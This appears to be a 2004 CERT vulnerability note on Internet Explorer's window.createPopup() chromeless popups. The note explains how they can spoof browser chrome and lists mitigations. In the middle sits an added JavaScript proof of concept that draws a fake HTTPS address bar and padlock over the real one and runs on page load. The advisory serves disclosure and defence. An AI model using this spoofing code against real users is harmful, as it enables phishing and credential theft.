The Internet Explorer (IE) window.createPopup() method creates chromeless popup windows. These windows can be used to spoof the user interface in Internet Explorer, any Windows application, or the Windows desktop.
The visible area of a web browser window can be divided into two regions: content and chrome. The content area is where the web browser renders HTML and other data. The chrome area surrounds the content area and includes the status bar, address bar, toolbar, and menu area. In most cases, the entire browser window (chrome and content) is enclosed by "window management decorations" - title, frame, and minimize, maximize, resize, and close controls.
The IE Dynamic HTML (DHTML) model supports a proprietary method to create chromeless popup windows. This method, window.createPopup(), creates browser windows with the following characteristics:
By convincing the user to view an HTML document (e.g., web page, email message) an attacker can deceive the user by changing the appearance of the GUI. Because of their unique characteristics, chromeless windows can be used to facilitate phishing attacks. For example, an attacker can create a fake address bar and HTTPS padlock icon to spoof a secure website.
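The following JavaScript is an added illustration of the address-bar spoof described above; it is not code from this note or from the published exploit. Only window.createPopup(), popup.document, popup.show(x, y, w, h) with desktop coordinates when no anchor element is given, window.screenLeft/screenTop and document.body.clientWidth are real IE 5.5+ APIs. The markup of the fake bar, the assumed 24-pixel address-bar height and the example URL are assumptions made for the example. It only does anything in IE with Active scripting enabled; anywhere else (another browser, scripting disabled, or a script host such as Node) createPopup is undefined and the helper returns null, which is why the workarounds below neutralise it.

```javascript
// Added example: abusing IE's window.createPopup() to draw a fake address
// bar over the real one.  Not the CERT note's or the exploit author's code.

// Build the HTML drawn inside the chromeless popup.  Assumed markup: it
// mimics an address bar showing an https:// URL plus a "padlock" label; a
// real attack would reuse images copied from the target browser's chrome.
function buildFakeAddressBar(displayUrl) {
  // Escape so the displayed URL cannot break out of the markup.
  var safe = String(displayUrl).replace(/[&<>"]/g, function (c) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' }[c];
  });
  return '<div style="font:12px Tahoma;background:#fff;' +
         'border:1px solid #7f9db9;height:20px;line-height:20px;' +
         'padding-left:4px;white-space:nowrap">Address ' +
         '<span style="border:1px inset #ccc;padding:0 4px">' + safe +
         '</span> <span title="SSL">[padlock]</span></div>';
}

// Assumed height of the real IE address bar in pixels.  A real attack would
// tune this per IE version and toolbar layout.
var ADDRESS_BAR_HEIGHT = 24;

// Desktop coordinates at which to show the popup so that it covers the real
// address bar.  popup.show(x, y, w, h) without an anchor element takes
// desktop (screen) coordinates, and IE's window.screenLeft/screenTop give
// the screen position of the top-left corner of the content area, so the
// chrome sits immediately above that point.
function placementOverAddressBar(screenLeft, screenTop, contentWidth) {
  return {
    x: screenLeft,
    y: screenTop - ADDRESS_BAR_HEIGHT,
    width: contentWidth,
    height: ADDRESS_BAR_HEIGHT
  };
}

// Glue that only works in IE 5.5+ with Active scripting enabled.  Returns
// the popup object on success and null where createPopup is unavailable.
function showSpoofedAddressBar(win, displayUrl) {
  if (!win || typeof win.createPopup !== 'function') {
    return null; // not IE, or scripting off: nothing to spoof with
  }
  var popup = win.createPopup();
  popup.document.body.innerHTML = buildFakeAddressBar(displayUrl);
  var p = placementOverAddressBar(win.screenLeft, win.screenTop,
                                  win.document.body.clientWidth);
  popup.show(p.x, p.y, p.width, p.height);
  return popup;
}

// Usage when loaded in a browser (assumed URL); a no-op outside IE.
if (typeof window !== 'undefined') {
  showSpoofedAddressBar(window, 'https://www.example.com/login');
}
```

Because the popup's coordinates are screen-relative rather than page-relative, the same technique places content over any part of the IE chrome, another application, or the desktop; the address bar is just the case most useful for phishing.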
Install Windows XP Service Pack 2 (SP2)
Disable Active scripting and ActiveX controls
Disabling Active scripting prevents attackers from creating chromeless windows using window.createPopup(). Disabling ActiveX controls prevents IE from making images transparent, which is a component of publicly available exploit code.
At a minimum, disable Active scripting and ActiveX controls in the Internet zone and the zone used by Outlook, Outlook Express, or any other software that uses the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML). Instructions for disabling Active scripting and ActiveX controls can be found in the Malicious Web Scripts FAQ.
Apply the Outlook Email Security Update
Another way to effectively disable Active scripting and ActiveX controls in Outlook is to install the Outlook Email Security Update. The update configures Outlook to open email messages in the Restricted Sites Zone, where Active scripting and ActiveX controls are disabled by default. In addition, the update provides further protection against malicious code that attempts to propagate via Outlook. The Outlook Email Security Update is available for Outlook 98 and Outlook 2000. The functionality of the Outlook Email Security Update is included in Outlook 2002 and Outlook Express 6.
Render email in plain text
Configure email client software (mail user agent [MUA]) to render email messages in plain text. Instructions to configure Outlook 2002 and Outlook Express 6 are available in Microsoft Knowledge Base Articles 307594 and 291387, respectively. HTML-formatted email messages may not appear properly; however, script will not be evaluated, which prevents certain types of attacks.
Maintain updated antivirus software
Antivirus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely on antivirus software to defend against this vulnerability.
Use a different web browser
There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, the graphical user interface (GUI), and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser, especially when browsing untrusted sites. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML).
Thanks to Georgi Guninski and Andrew Clover for reporting this vulnerability.
This document was written by Will Dormann and Art Manion.
Date First Published: 2004-09-10
Date Last Updated: 2004-10-27 21:31 UTC